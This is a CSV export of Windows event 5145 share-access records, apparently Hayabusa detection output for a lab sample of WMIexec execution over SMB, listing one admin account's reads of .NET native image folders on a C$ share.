2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
